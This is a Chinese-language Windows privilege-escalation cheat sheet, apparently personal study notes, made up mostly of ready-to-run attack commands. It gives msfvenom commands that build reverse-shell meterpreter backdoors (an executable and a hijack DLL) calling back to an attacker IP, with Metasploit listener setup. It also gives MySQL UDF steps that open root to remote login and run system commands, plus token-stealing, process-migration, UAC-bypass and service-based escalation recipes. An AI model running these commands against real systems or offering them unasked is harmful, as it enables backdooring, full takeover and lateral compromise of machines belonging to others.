一、溢出漏洞提权
前提:
1.有当前计算机的web权限,建立在web权限取得的情况下进行的权限提升
2.符合的操作系统
3.符合的溢出漏洞
提权辅助网页 Windows提权辅助 (hacking8.com)
步骤:
1.信息收集-操作系统版本 漏洞补丁 计算机位数 杀软 网络 当前权限 等
2.基于补丁和位数以及系统版本筛选溢出漏洞EXP(CS/MSF/手工)
3.上传EXP调用执行去提权
MSF步骤:
1.生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=4444 -f exe -o msf.exe
2.配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.130
set lport 4444
run
3.信息收集
getuid
..
4.msf筛选使用模块
use post/windows/gather/enum_pathes (半自动:根据漏洞编号找出系统安装的补丁)
use post/multi/recon/local_exploit_suggester (全自动:快速识别系统中可能被利用的漏洞)
set showdescription true
set session 1 (看你session为几)
5.使用筛选出的模块进行提权
use xxxxx/xxxx/xxx
show options (查看必须需要填写的参数)
set xxx xxxx
..
run
二、数据库提权
mysql提权:
前提:
1.有数据库的最高权限用户的密码(sql注入,数据库配置、备份文件,可远程连接的数据库爆破)
windows配置文件路径:
MySQL/data/mysql/user.MYD 或user.MYI
WWW/inc/conn.info.php
UDF提权:
获取密码->开启外联->高版本创建目录->MSF导出dll->Webshell执行后续
1.mysql<5.2 导出目录c:/windows或system32
2.mysql>=5.2 导出安装目录/lib/plugin/ 安装目录获取:select @@basedir
开启外联:
use mysql;
update user set host = '%' where user = 'root';
或者
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '获取到的root密码' WITH GRANT OPTION;
MSF导出dll:
msf:
use exploit/multi/mysql/mysql_udf_payload
set username root
set password 获取的root密码
set rhost ..
set rport ..
run
mysql:
select * from mysql.func where name="sys_exec"; #获取dll名字
create function sys_eval returns string soname "udf.dll"'; #重新创建函数绑定获取的dll
select sys_eval('ipconfig'); #执行命令
sqlserver提权:
xp_cmdshell,sp_oacreate,沙箱提权
三、at提权
在windows 2008 以及 win7以前的版本可以使用at提权,前提拥有shell的桌面交互权限
at 20:00 /interactive cmd #创建在20:00以system权限开启一个cmd窗口的计划任务
四、sc提权
在windows 2003中版本可以使用
#创建一个名叫sysycmd的新的交互式shell执行服务
sc Create syscmd binPath="cmd /K start" type=own type=interact
#运行服务
sc start syscmd
五、psexec提权
PsExec.exe -accepteula -s -i -d cmd #调用运行cmd
psexec下载使用:PsExec - Sysinternals | Microsoft Learn
六、进程迁移注入
msf上线
meterpreter->
ps #查看属于NT AUTHORITY\SYSTEM的进程,找到想用的进程PID
migrate 5552 #进程迁移
getuid #查看uid 提权成功
七、令牌窃取
msf上线
meterpreter->
use incognito
list_tokens -u #列出用户令牌
impersonate_token "NT AUTHORITY\SYSTEM"
getuid #查看uid 提权成功
MS16-075烂土豆提权是基于令牌窃取提权。其适用版本:Windows 7、8、10、2008、2012
msf上线
meterpreter->
getprivs #获取主机拥有的特权名,如果有SeImpersonatePrivilege,则可以继续进行
use incognito
list_tokens -u
execute -cH -f c:\\wmpub\\potato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
八、UAC绕过
UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。绕过前提:必须是在管理员组中
use exploit/windows/local/bypassuac_injection
set session 3
run
九、DLL劫持
Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)
1.收集进程加载的dll
2.使用msf生成篡改dll
3.替换dll
4.上线
【Windows提权】本地提权之dll劫持_dll劫持提权-CSDN博客
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=4444 -f dll >./libssl-1_1.dll